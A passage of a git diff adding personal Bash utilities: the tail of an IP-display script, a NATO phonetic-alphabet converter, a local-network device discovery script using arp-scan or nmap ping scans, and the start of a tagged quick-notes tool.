|
colorized_output() {
|
||||||
|
local show_external=${1:-true}
|
||||||
|
local show_internal=${2:-true}
|
||||||
|
local show_all=${3:-false}
|
||||||
|
|
||||||
|
if [[ "$show_external" == "true" ]]; then
|
||||||
|
echo -e "${BOLD}${CYAN}External IP:${NC}"
|
||||||
|
external_ip=$(get_external_ip || echo "${RED}Unable to fetch${NC}")
|
||||||
|
echo -e " ${GREEN}$external_ip${NC}"
|
||||||
|
echo
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [[ "$show_internal" == "true" ]]; then
|
||||||
|
echo -e "${BOLD}${CYAN}Internal IPs:${NC}"
|
||||||
|
while IFS=: read -r iface ip; do
|
||||||
|
echo -e " ${YELLOW}$iface${NC}: ${GREEN}$ip${NC}"
|
||||||
|
done < <(get_internal_ips_detailed)
|
||||||
|
echo
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [[ "$show_all" == "true" ]]; then
|
||||||
|
echo -e "${BOLD}${CYAN}Gateway:${NC}"
|
||||||
|
echo -e " ${GREEN}$(get_gateway)${NC}"
|
||||||
|
echo
|
||||||
|
|
||||||
|
echo -e "${BOLD}${CYAN}DNS Servers:${NC}"
|
||||||
|
for dns in $(get_dns_servers); do
|
||||||
|
echo -e " ${GREEN}$dns${NC}"
|
||||||
|
done
|
||||||
|
echo
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Parse arguments
|
||||||
|
mode="default"
|
||||||
|
show_external=true
|
||||||
|
show_internal=true
|
||||||
|
show_all=false
|
||||||
|
copy_to_clipboard=false
|
||||||
|
json_format=false
|
||||||
|
|
||||||
|
while [[ $# -gt 0 ]]; do
|
||||||
|
case $1 in
|
||||||
|
-e|--external)
|
||||||
|
show_external=true
|
||||||
|
show_internal=false
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
-i|--internal)
|
||||||
|
show_external=false
|
||||||
|
show_internal=true
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
-c|--copy)
|
||||||
|
copy_to_clipboard=true
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
-j|--json)
|
||||||
|
json_format=true
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
-a|--all)
|
||||||
|
show_all=true
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
-h|--help)
|
||||||
|
show_help
|
||||||
|
exit 0
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
echo "${RED}Error: Unknown option: $1${NC}" >&2
|
||||||
|
echo "Run 'myip --help' for usage information" >&2
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
done
|
||||||
|
|
||||||
|
# Clipboard helper
|
||||||
|
clip_set() {
|
||||||
|
if command -v xsel &>/dev/null; then
|
||||||
|
xsel --input --clipboard
|
||||||
|
elif command -v xclip &>/dev/null; then
|
||||||
|
xclip -selection clipboard
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Main logic
|
||||||
|
if [[ "$json_format" == "true" ]]; then
|
||||||
|
json_output
|
||||||
|
elif [[ "$copy_to_clipboard" == "true" ]]; then
|
||||||
|
external_ip=$(get_external_ip)
|
||||||
|
echo -n "$external_ip" | clip_set
|
||||||
|
echo -e "${GREEN}✓${NC} Copied to clipboard: ${BOLD}$external_ip${NC}"
|
||||||
|
else
|
||||||
|
colorized_output "$show_external" "$show_internal" "$show_all"
|
||||||
|
fi
|
||||||
43
scripts/nato
Executable file
43
scripts/nato
Executable file
|
|
@ -0,0 +1,43 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: nato
|
||||||
|
# Description: Convert strings to NATO phonetic alphabet
|
||||||
|
# Source: Inspired by https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||||
|
# Usage: nato bar # Output: Bravo Alfa Romeo
|
||||||
|
# nato "hello 123"
|
||||||
|
|
||||||
|
if [[ $# -eq 0 ]]; then
|
||||||
|
echo "Usage: nato <string>" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# NATO phonetic alphabet mapping
|
||||||
|
declare -A nato_map=(
|
||||||
|
[a]="Alfa" [b]="Bravo" [c]="Charlie" [d]="Delta" [e]="Echo"
|
||||||
|
[f]="Foxtrot" [g]="Golf" [h]="Hotel" [i]="India" [j]="Juliett"
|
||||||
|
[k]="Kilo" [l]="Lima" [m]="Mike" [n]="November" [o]="Oscar"
|
||||||
|
[p]="Papa" [q]="Quebec" [r]="Romeo" [s]="Sierra" [t]="Tango"
|
||||||
|
[u]="Uniform" [v]="Victor" [w]="Whiskey" [x]="Xray" [y]="Yankee"
|
||||||
|
[z]="Zulu"
|
||||||
|
[0]="Zero" [1]="One" [2]="Two" [3]="Three" [4]="Four"
|
||||||
|
[5]="Five" [6]="Six" [7]="Seven" [8]="Eight" [9]="Niner"
|
||||||
|
)
|
||||||
|
|
||||||
|
# Convert all arguments to lowercase and process each character
|
||||||
|
input="$(echo "$*" | tr '[:upper:]' '[:lower:]')"
|
||||||
|
|
||||||
|
result=()
|
||||||
|
while IFS= read -r -n1 char; do
|
||||||
|
# Skip empty characters
|
||||||
|
[[ -z "$char" ]] && continue
|
||||||
|
|
||||||
|
if [[ -n "${nato_map[$char]:-}" ]]; then
|
||||||
|
result+=("${nato_map[$char]}")
|
||||||
|
elif [[ "$char" == " " ]]; then
|
||||||
|
result+=("/") # Use / as space separator
|
||||||
|
fi
|
||||||
|
done <<< "$input"
|
||||||
|
|
||||||
|
# Output with spaces between words
|
||||||
|
echo "${result[*]}"
|
||||||
476
scripts/network-discovery.sh
Executable file
476
scripts/network-discovery.sh
Executable file
|
|
@ -0,0 +1,476 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: network-discovery.sh
|
||||||
|
# Description: Discover devices on local network and highlight the newest device
|
||||||
|
# Version: 1.0.0
|
||||||
|
# Dependencies: arp-scan (or nmap), gum (optional but recommended)
|
||||||
|
|
||||||
|
# === Configuration ===
|
||||||
|
readonly SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
|
||||||
|
readonly VERSION="1.0.0"
|
||||||
|
readonly LOGFILE="${LOGFILE:-/tmp/$(basename "$0" .sh)-$$.log}"
|
||||||
|
|
||||||
|
# Ensure log file is writable
|
||||||
|
touch "$LOGFILE" 2>/dev/null || LOGFILE="/dev/null"
|
||||||
|
chmod 644 "$LOGFILE" 2>/dev/null || true
|
||||||
|
|
||||||
|
# Colors for output
|
||||||
|
readonly RED='\033[0;31m'
|
||||||
|
readonly GREEN='\033[0;32m'
|
||||||
|
readonly YELLOW='\033[1;33m'
|
||||||
|
readonly BLUE='\033[0;34m'
|
||||||
|
readonly CYAN='\033[0;36m'
|
||||||
|
readonly MAGENTA='\033[0;35m'
|
||||||
|
readonly BOLD='\033[1m'
|
||||||
|
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
# === Logging Functions ===
|
||||||
|
log() {
|
||||||
|
echo "[$(date '+%Y-%m-%d %H:%M:%S')] [INFO] $*" | tee -a "$LOGFILE"
|
||||||
|
}
|
||||||
|
|
||||||
|
log_error() {
|
||||||
|
echo "[$(date '+%Y-%m-%d %H:%M:%S')] [ERROR] $*" | tee -a "$LOGFILE" >&2
|
||||||
|
}
|
||||||
|
|
||||||
|
log_warn() {
|
||||||
|
echo "[$(date '+%Y-%m-%d %H:%M:%S')] [WARN] $*" | tee -a "$LOGFILE"
|
||||||
|
}
|
||||||
|
|
||||||
|
# === Cleanup Handler ===
|
||||||
|
TEMP_FILES=()
|
||||||
|
|
||||||
|
cleanup() {
|
||||||
|
local exit_code=$?
|
||||||
|
|
||||||
|
# Clean temp files
|
||||||
|
for file in "${TEMP_FILES[@]}"; do
|
||||||
|
[[ -f "$file" ]] && rm -f "$file"
|
||||||
|
done
|
||||||
|
|
||||||
|
# Clean log file on successful completion
|
||||||
|
if [[ $exit_code -eq 0 ]] && [[ "$LOGFILE" != "/dev/null" ]]; then
|
||||||
|
rm -f "$LOGFILE" 2>/dev/null || true
|
||||||
|
fi
|
||||||
|
|
||||||
|
exit $exit_code
|
||||||
|
}
|
||||||
|
|
||||||
|
trap cleanup EXIT INT TERM
|
||||||
|
|
||||||
|
# === Dependency Checking ===
|
||||||
|
HAS_GUM=false
|
||||||
|
HAS_ARP_SCAN=false
|
||||||
|
SCAN_METHOD=""
|
||||||
|
|
||||||
|
check_dependencies() {
|
||||||
|
# Check for gum (optional) - check common locations
|
||||||
|
if command -v gum &>/dev/null; then
|
||||||
|
HAS_GUM=true
|
||||||
|
elif [[ -x "$HOME/go/bin/gum" ]]; then
|
||||||
|
HAS_GUM=true
|
||||||
|
export PATH="$HOME/go/bin:$PATH"
|
||||||
|
elif [[ -x "/home/e/go/bin/gum" ]]; then
|
||||||
|
HAS_GUM=true
|
||||||
|
export PATH="/home/e/go/bin:$PATH"
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Check for scanning tools
|
||||||
|
if command -v arp-scan &>/dev/null; then
|
||||||
|
HAS_ARP_SCAN=true
|
||||||
|
SCAN_METHOD="arp-scan"
|
||||||
|
elif command -v nmap &>/dev/null; then
|
||||||
|
SCAN_METHOD="nmap"
|
||||||
|
log_warn "Using nmap (arp-scan recommended for better MAC detection)"
|
||||||
|
else
|
||||||
|
log_error "No network scanning tool found"
|
||||||
|
echo "Please install one of:"
|
||||||
|
echo " sudo apt install arp-scan (recommended)"
|
||||||
|
echo " sudo apt install nmap"
|
||||||
|
return 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
return 0
|
||||||
|
}
|
||||||
|
|
||||||
|
# === UI Functions ===
|
||||||
|
show_header() {
|
||||||
|
clear
|
||||||
|
|
||||||
|
if [[ "$HAS_GUM" == "true" ]]; then
|
||||||
|
gum style \
|
||||||
|
--border thick \
|
||||||
|
--border-foreground 12 \
|
||||||
|
--align center \
|
||||||
|
--width 60 \
|
||||||
|
--margin "1" \
|
||||||
|
--padding "1 2" \
|
||||||
|
"🔍 NETWORK DEVICE DISCOVERY" \
|
||||||
|
"" \
|
||||||
|
"v${VERSION}" \
|
||||||
|
"Scanning local network..."
|
||||||
|
echo
|
||||||
|
else
|
||||||
|
echo -e "${BLUE}╔════════════════════════════════════════════════════╗${NC}"
|
||||||
|
echo -e "${BLUE}║${NC} 🔍 ${BOLD}NETWORK DEVICE DISCOVERY${NC} ${BLUE}║${NC}"
|
||||||
|
echo -e "${BLUE}║${NC} ${BLUE}║${NC}"
|
||||||
|
echo -e "${BLUE}║${NC} v${VERSION} ${BLUE}║${NC}"
|
||||||
|
echo -e "${BLUE}║${NC} Scanning local network... ${BLUE}║${NC}"
|
||||||
|
echo -e "${BLUE}╚════════════════════════════════════════════════════╝${NC}"
|
||||||
|
echo
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# === Network Functions ===
|
||||||
|
get_local_network() {
|
||||||
|
# Get the default gateway and derive network
|
||||||
|
local gateway
|
||||||
|
gateway=$(ip route | grep default | awk '{print $3}' | head -n1)
|
||||||
|
|
||||||
|
if [[ -z "$gateway" ]]; then
|
||||||
|
log_error "Could not determine default gateway"
|
||||||
|
return 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Extract network (assumes /24)
|
||||||
|
local network
|
||||||
|
network=$(echo "$gateway" | cut -d. -f1-3)
|
||||||
|
echo "${network}.0/24"
|
||||||
|
}
|
||||||
|
|
||||||
|
scan_network_arp_scan() {
|
||||||
|
local network="$1"
|
||||||
|
local output_file="$2"
|
||||||
|
|
||||||
|
if [[ "$HAS_GUM" == "true" ]]; then
|
||||||
|
echo -e "${CYAN}🔍 Scanning network with arp-scan...${NC}"
|
||||||
|
(
|
||||||
|
sudo arp-scan --interface=eth0 --localnet 2>/dev/null || \
|
||||||
|
sudo arp-scan --interface=wlan0 --localnet 2>/dev/null || \
|
||||||
|
sudo arp-scan --localnet 2>/dev/null
|
||||||
|
) | tee "$output_file" &
|
||||||
|
|
||||||
|
local scan_pid=$!
|
||||||
|
# Spinner options: dot, pulse, points, minidot, line, jump, globe, moon, monkey, meter, hamburger
|
||||||
|
gum spin --spinner pulse --title "Scanning local network..." -- bash -c "while kill -0 $scan_pid 2>/dev/null; do sleep 0.1; done"
|
||||||
|
wait $scan_pid
|
||||||
|
else
|
||||||
|
echo -e "${CYAN}⏳ Scanning network with arp-scan...${NC}"
|
||||||
|
sudo arp-scan --localnet 2>/dev/null | tee "$output_file"
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
scan_network_nmap() {
|
||||||
|
local network="$1"
|
||||||
|
local output_file="$2"
|
||||||
|
|
||||||
|
if [[ "$HAS_GUM" == "true" ]]; then
|
||||||
|
echo -e "${CYAN}🔍 Scanning network with nmap...${NC}"
|
||||||
|
(
|
||||||
|
sudo nmap -sn -PR "$network" 2>/dev/null
|
||||||
|
) | tee "$output_file" &
|
||||||
|
|
||||||
|
local scan_pid=$!
|
||||||
|
# Spinner options: dot, pulse, points, minidot, line, jump, globe, moon, monkey, meter, hamburger
|
||||||
|
gum spin --spinner pulse --title "Scanning local network..." -- bash -c "while kill -0 $scan_pid 2>/dev/null; do sleep 0.1; done"
|
||||||
|
wait $scan_pid
|
||||||
|
else
|
||||||
|
echo -e "${CYAN}⏳ Scanning network with nmap...${NC}"
|
||||||
|
sudo nmap -sn -PR "$network" 2>/dev/null | tee "$output_file"
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
parse_arp_scan_results() {
|
||||||
|
local scan_file="$1"
|
||||||
|
local results_file="$2"
|
||||||
|
|
||||||
|
# Parse arp-scan output: IP, MAC, Vendor
|
||||||
|
# arp-scan format: 192.168.1.1 aa:bb:cc:dd:ee:ff Vendor Name
|
||||||
|
# Using pipe (|) as delimiter instead of comma to handle vendor names with commas
|
||||||
|
grep -E "([0-9]{1,3}\.){3}[0-9]{1,3}" "$scan_file" | \
|
||||||
|
grep -v "^Interface\|^Starting\|^Ending\|packets received" | \
|
||||||
|
awk '{
|
||||||
|
ip=$1
|
||||||
|
mac=$2
|
||||||
|
vendor=$3
|
||||||
|
for(i=4;i<=NF;i++) vendor=vendor" "$i
|
||||||
|
if(vendor=="") vendor="Unknown"
|
||||||
|
print ip"|"mac"|"vendor
|
||||||
|
}' > "$results_file"
|
||||||
|
}
|
||||||
|
|
||||||
|
parse_nmap_results() {
|
||||||
|
local scan_file="$1"
|
||||||
|
local results_file="$2"
|
||||||
|
|
||||||
|
# After nmap scan, check entire ARP cache for all discovered devices
|
||||||
|
log "Checking ARP cache for MAC addresses..."
|
||||||
|
|
||||||
|
# Get all IPs from nmap output
|
||||||
|
local found_ips=()
|
||||||
|
while read -r line; do
|
||||||
|
if [[ "$line" =~ "Nmap scan report for" ]]; then
|
||||||
|
local ip=$(echo "$line" | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}')
|
||||||
|
[[ -n "$ip" ]] && found_ips+=("$ip")
|
||||||
|
fi
|
||||||
|
done < "$scan_file"
|
||||||
|
|
||||||
|
# Now get MAC addresses from ARP cache
|
||||||
|
for ip in "${found_ips[@]}"; do
|
||||||
|
# Check arp cache
|
||||||
|
local arp_line
|
||||||
|
arp_line=$(arp -n | grep "^$ip " 2>/dev/null)
|
||||||
|
|
||||||
|
if [[ -n "$arp_line" ]]; then
|
||||||
|
# Parse: 10.98.0.1 ether aa:bb:cc:dd:ee:ff C eth0
|
||||||
|
local mac
|
||||||
|
mac=$(echo "$arp_line" | awk '{print $3}')
|
||||||
|
|
||||||
|
# Try to get vendor info (might need additional lookup)
|
||||||
|
local vendor="Unknown"
|
||||||
|
if [[ "$mac" =~ ^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$ ]]; then
|
||||||
|
# Valid MAC, try to identify device type
|
||||||
|
case "${mac:0:8}" in
|
||||||
|
"00:50:56"|"00:0c:29"|"00:05:69") vendor="VMware" ;;
|
||||||
|
"08:00:27") vendor="VirtualBox" ;;
|
||||||
|
"52:54:00") vendor="QEMU/KVM" ;;
|
||||||
|
*) vendor="Device" ;;
|
||||||
|
esac
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo "${ip},${mac},${vendor}"
|
||||||
|
else
|
||||||
|
echo "${ip},Unknown,Unknown"
|
||||||
|
fi
|
||||||
|
done > "$results_file"
|
||||||
|
}
|
||||||
|
|
||||||
|
find_newest_device() {
|
||||||
|
local results_file="$1"
|
||||||
|
|
||||||
|
# Get current ARP cache with timestamps
|
||||||
|
local newest_ip=""
|
||||||
|
local newest_mac=""
|
||||||
|
local newest_vendor=""
|
||||||
|
local newest_age=999999
|
||||||
|
|
||||||
|
# Read results and check ARP cache age (using pipe delimiter)
|
||||||
|
while IFS='|' read -r ip mac vendor; do
|
||||||
|
[[ -z "$ip" ]] && continue
|
||||||
|
|
||||||
|
# Check if device is in ARP cache
|
||||||
|
if arp -n "$ip" &>/dev/null; then
|
||||||
|
# Most recently added device will be at the end of the list
|
||||||
|
# We'll use the last device found as "newest"
|
||||||
|
newest_ip="$ip"
|
||||||
|
newest_mac="$mac"
|
||||||
|
newest_vendor="$vendor"
|
||||||
|
fi
|
||||||
|
done < "$results_file"
|
||||||
|
|
||||||
|
# If no ARP cache method works, just take the last device from scan
|
||||||
|
if [[ -z "$newest_ip" ]]; then
|
||||||
|
local last_line
|
||||||
|
last_line=$(tail -n1 "$results_file")
|
||||||
|
newest_ip=$(echo "$last_line" | cut -d'|' -f1)
|
||||||
|
newest_mac=$(echo "$last_line" | cut -d'|' -f2)
|
||||||
|
newest_vendor=$(echo "$last_line" | cut -d'|' -f3)
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo "${newest_ip}|${newest_mac}|${newest_vendor}"
|
||||||
|
}
|
||||||
|
|
||||||
|
display_results() {
|
||||||
|
local results_file="$1"
|
||||||
|
local newest_device="$2"
|
||||||
|
|
||||||
|
local newest_ip newest_mac newest_vendor
|
||||||
|
IFS='|' read -r newest_ip newest_mac newest_vendor <<< "$newest_device"
|
||||||
|
|
||||||
|
echo
|
||||||
|
if [[ "$HAS_GUM" == "true" ]]; then
|
||||||
|
gum style \
|
||||||
|
--border double \
|
||||||
|
--border-foreground 10 \
|
||||||
|
--padding "1" \
|
||||||
|
"📊 Discovered Devices"
|
||||||
|
echo
|
||||||
|
else
|
||||||
|
echo -e "${GREEN}╔══════════════════════════════════════════════════╗${NC}"
|
||||||
|
echo -e "${GREEN}║${NC} 📊 Discovered Devices ${GREEN}║${NC}"
|
||||||
|
echo -e "${GREEN}╚══════════════════════════════════════════════════╝${NC}"
|
||||||
|
echo
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Header
|
||||||
|
printf "${BOLD}%-16s %-20s %-30s${NC}\n" "IP ADDRESS" "MAC ADDRESS" "VENDOR"
|
||||||
|
echo "────────────────────────────────────────────────────────────────────"
|
||||||
|
|
||||||
|
# Display all devices - use awk to do ALL the formatting
|
||||||
|
local device_count
|
||||||
|
device_count=$(wc -l < "$results_file" 2>/dev/null || echo 0)
|
||||||
|
|
||||||
|
# Use awk to format everything directly (avoids pipe/subshell issues)
|
||||||
|
awk -F '|' -v newest_ip="$newest_ip" \
|
||||||
|
-v MAGENTA="${MAGENTA}" -v CYAN="${CYAN}" -v YELLOW="${YELLOW}" \
|
||||||
|
-v GREEN="${GREEN}" -v BOLD="${BOLD}" -v NC="${NC}" \
|
||||||
|
'{
|
||||||
|
ip=$1
|
||||||
|
mac=$2
|
||||||
|
vendor=$3
|
||||||
|
|
||||||
|
if (ip == newest_ip) {
|
||||||
|
# Newest device - HIGHLIGHT IT!
|
||||||
|
printf "%s%s%-16s%s %s%s%-20s%s %s%-30s%s %s⭐ NEWEST%s\n", \
|
||||||
|
BOLD, MAGENTA, ip, NC, \
|
||||||
|
BOLD, CYAN, mac, NC, \
|
||||||
|
YELLOW, vendor, NC, \
|
||||||
|
GREEN, NC
|
||||||
|
} else {
|
||||||
|
printf "%-16s %-20s %-30s\n", ip, mac, vendor
|
||||||
|
}
|
||||||
|
}' "$results_file"
|
||||||
|
|
||||||
|
echo
|
||||||
|
echo -e "${BLUE}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"
|
||||||
|
|
||||||
|
# Summary box
|
||||||
|
if [[ "$HAS_GUM" == "true" ]]; then
|
||||||
|
gum style \
|
||||||
|
--border rounded \
|
||||||
|
--border-foreground 10 \
|
||||||
|
--foreground 10 \
|
||||||
|
--padding "1" \
|
||||||
|
"✅ Scan Complete!" \
|
||||||
|
"" \
|
||||||
|
"Total devices found: ${device_count}" \
|
||||||
|
"Newest device: ${newest_ip}" \
|
||||||
|
"MAC Address: ${newest_mac}" \
|
||||||
|
"Vendor: ${newest_vendor}"
|
||||||
|
else
|
||||||
|
echo
|
||||||
|
echo -e "${GREEN}✅ Scan Complete!${NC}"
|
||||||
|
echo -e "${BOLD}Total devices found:${NC} ${device_count}"
|
||||||
|
echo
|
||||||
|
echo -e "${BOLD}${MAGENTA}Newest Device:${NC}"
|
||||||
|
echo -e " ${BOLD}IP:${NC} ${newest_ip}"
|
||||||
|
echo -e " ${BOLD}MAC:${NC} ${newest_mac}"
|
||||||
|
echo -e " ${BOLD}Vendor:${NC} ${newest_vendor}"
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo
|
||||||
|
}
|
||||||
|
|
||||||
|
# === Usage Function ===
|
||||||
|
usage() {
|
||||||
|
cat << EOF
|
||||||
|
Usage: $(basename "$0") [OPTIONS]
|
||||||
|
|
||||||
|
Description:
|
||||||
|
Scan local network for devices and highlight the newest device
|
||||||
|
|
||||||
|
Options:
|
||||||
|
-h, --help Show this help message
|
||||||
|
-v, --verbose Enable verbose output
|
||||||
|
|
||||||
|
Examples:
|
||||||
|
sudo $(basename "$0")
|
||||||
|
sudo $(basename "$0") --verbose
|
||||||
|
|
||||||
|
Requirements:
|
||||||
|
- Must run with sudo (for network scanning)
|
||||||
|
- arp-scan or nmap installed
|
||||||
|
- gum (optional, for enhanced UI)
|
||||||
|
|
||||||
|
EOF
|
||||||
|
}
|
||||||
|
|
||||||
|
# === Main Logic ===
|
||||||
|
main() {
|
||||||
|
# Parse arguments
|
||||||
|
while [[ $# -gt 0 ]]; do
|
||||||
|
case "$1" in
|
||||||
|
-h|--help)
|
||||||
|
usage
|
||||||
|
exit 0
|
||||||
|
;;
|
||||||
|
-v|--verbose)
|
||||||
|
set -x
|
||||||
|
shift
|
||||||
|
;;
|
||||||
|
*)
|
||||||
|
log_error "Unknown option: $1"
|
||||||
|
usage
|
||||||
|
exit 1
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
done
|
||||||
|
|
||||||
|
# Check if running as root
|
||||||
|
if [[ $EUID -ne 0 ]]; then
|
||||||
|
log_error "This script must be run as root (for network scanning)"
|
||||||
|
echo "Please run: sudo $0"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Check dependencies
|
||||||
|
check_dependencies || exit 2
|
||||||
|
|
||||||
|
# Show header
|
||||||
|
show_header
|
||||||
|
|
||||||
|
# Show arp-scan tip if using nmap
|
||||||
|
if [[ "$SCAN_METHOD" == "nmap" ]]; then
|
||||||
|
echo -e "${YELLOW}💡 Tip: Install arp-scan for better device detection${NC}"
|
||||||
|
echo -e "${YELLOW} Command: sudo apt install arp-scan${NC}"
|
||||||
|
echo
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Get local network
|
||||||
|
log "Detecting local network..."
|
||||||
|
local network
|
||||||
|
network=$(get_local_network)
|
||||||
|
log "Network: $network"
|
||||||
|
echo -e "${BLUE}ℹ️ Network: ${BOLD}$network${NC}"
|
||||||
|
echo
|
||||||
|
|
||||||
|
# Create temp files
|
||||||
|
local scan_file results_file
|
||||||
|
scan_file=$(mktemp)
|
||||||
|
results_file=$(mktemp)
|
||||||
|
# Only add scan_file to cleanup - we need results_file until display is done
|
||||||
|
TEMP_FILES+=("$scan_file")
|
||||||
|
|
||||||
|
# Scan network
|
||||||
|
log "Scanning network with $SCAN_METHOD"
|
||||||
|
if [[ "$SCAN_METHOD" == "arp-scan" ]]; then
|
||||||
|
scan_network_arp_scan "$network" "$scan_file"
|
||||||
|
parse_arp_scan_results "$scan_file" "$results_file"
|
||||||
|
else
|
||||||
|
scan_network_nmap "$network" "$scan_file"
|
||||||
|
parse_nmap_results "$scan_file" "$results_file"
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Check if we found any devices
|
||||||
|
if [[ ! -s "$results_file" ]]; then
|
||||||
|
log_error "No devices found on network"
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Find newest device
|
||||||
|
log "Analyzing results..."
|
||||||
|
local newest_device
|
||||||
|
newest_device=$(find_newest_device "$results_file")
|
||||||
|
|
||||||
|
# Display results
|
||||||
|
display_results "$results_file" "$newest_device"
|
||||||
|
|
||||||
|
# Clean up results file after display
|
||||||
|
rm -f "$results_file"
|
||||||
|
|
||||||
|
log "✅ Network discovery complete"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Run main function
|
||||||
|
main "$@"
|
||||||
192
scripts/note
Executable file
192
scripts/note
Executable file
|
|
@ -0,0 +1,192 @@
|
||||||
|
#!/usr/bin/env bash
|
||||||
|
set -euo pipefail
|
||||||
|
|
||||||
|
# Script Name: note
|
||||||
|
# Description: Quick notes with tags, search, and project awareness
|
||||||
|
# Usage: note "quick thought" # Add note
|
||||||
|
# note -t security "found XSS" # Tagged note
|
||||||
|
# note -s "search term" # Search notes
|
||||||
|
# note -l # List recent notes
|
||||||
|
# note -e # Edit notes file
|
||||||
|
|
||||||
|
VERSION="1.0.0"
|
||||||
|
|
||||||
|
# Determine notes location (project-aware)
|
||||||
|
if git rev-parse --git-dir > /dev/null 2>&1; then
|
||||||
|
# In a git repo - use project notes
|
||||||
|
NOTES_FILE="$(git rev-parse --show-toplevel)/.notes.md"
|
||||||
|
else
|
||||||
|
# Global notes
|
||||||
|
NOTES_FILE="$HOME/notes.md"
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Colors
|
||||||
|
readonly GREEN='\033[0;32m'
|
||||||
|
readonly YELLOW='\033[1;33m'
|
||||||
|
readonly BLUE='\033[0;34m'
|
||||||
|
readonly CYAN='\033[0;36m'
|
||||||
|
readonly BOLD='\033[1m'
|
||||||
|
readonly NC='\033[0m'
|
||||||
|
|
||||||
|
show_help() {
|
||||||
|
echo -e "\033[1mnote\033[0m - Quick Notes Tool v${VERSION}"
|
||||||
|
echo
|
||||||
|
echo -e "\033[1mUSAGE:\033[0m"
|
||||||
|
echo " note <text> Add a note"
|
||||||
|
echo " note [OPTIONS]"
|
||||||
|
echo
|
||||||
|
echo -e "\033[1mOPTIONS:\033[0m"
|
||||||
|
echo -e " \033[0;36m-t, --tag\033[0m Add note with tag"
|
||||||
|
echo -e " \033[0;36m-s, --search\033[0m Search notes"
|
||||||
|
echo -e " \033[0;36m-l, --list\033[0m List recent notes (last 10)"
|
||||||
|
echo -e " \033[0;36m-e, --edit\033[0m Edit notes file"
|
||||||
|
echo -e " \033[0;36m-p, --path\033[0m Show notes file path"
|
||||||
|
echo -e " \033[0;36m-h, --help\033[0m Show this help message"
|
||||||
|
echo
|
||||||
|
echo -e "\033[1mEXAMPLES:\033[0m"
|
||||||
|
echo " note \"remember to test this\""
|
||||||
|
echo " note -t security \"found XSS in login\""
|
||||||
|
echo " note -t todo \"implement feature X\""
|
||||||
|
echo " note -s \"XSS\""
|
||||||
|
echo " note -l"
|
||||||
|
echo
|
||||||
|
echo -e "\033[1mNOTES LOCATION:\033[0m"
|
||||||
|
echo " Current: ${NOTES_FILE}"
|
||||||
|
if git rev-parse --git-dir > /dev/null 2>&1; then
|
||||||
|
echo -e " ${CYAN}(Project notes - in git repo)${NC}"
|
||||||
|
else
|
||||||
|
echo -e " ${YELLOW}(Global notes)${NC}"
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
|
||||||
|
# Add note
|
||||||
|
add_note() {
|
||||||
|
local text="$1"
|
||||||
|
local tag="${2:-general}"
|
||||||
|
|
||||||
|
# Create file if it doesn't exist
|
||||||
|
if [[ ! -f "$NOTES_FILE" ]]; then
|
||||||
|
echo "# Notes" > "$NOTES_FILE"
|
||||||
|
echo >> "$NOTES_FILE"
|
||||||
|
fi
|
||||||
|
|
||||||
|
# Format: ## YYYY-MM-DD HH:MM - [TAG]
|
||||||
|
timestamp=$(date '+%Y-%m-%d %H:%M')
|
||||||
|
echo "## $timestamp - [$tag]" >> "$NOTES_FILE"
|
||||||
|
echo >> "$NOTES_FILE"
|
||||||
|
echo "$text" >> "$NOTES_FILE"
|
||||||
|
echo >> "$NOTES_FILE"
|
||||||
|
|
||||||
|
echo -e "${GREEN}✓${NC} Note added to: ${NOTES_FILE}"
|
||||||
|
echo -e "${CYAN}Tag:${NC} $tag"
|
||||||
|
}
|
||||||
|
|
||||||
|
# Search notes
|
||||||
|
search_notes() {
|
||||||
|
local query="$1"
|
||||||
|
|
||||||
|
if [[ ! -f "$NOTES_FILE" ]]; then
|
||||||
|
echo -e "${YELLOW}No notes file found${NC}" >&2
|
||||||
|
exit 1
|
||||||
|
fi
|
||||||
|
|
||||||
|
echo -e "${BOLD}${CYAN}Search results for: ${query}${NC}"
|
||||||
|
echo
|
||||||
|
|
||||||
|
# Use bat if available for syntax highlighting, otherwise grep with context
|
||||||
|
if command -v bat &>/dev/null; then
|
||||||
|
grep -i --color=always "$query" "$NOTES_FILE" -B 2 -A 2 || echo "No matches found"
|
||||||
|
else
|
||||||
|
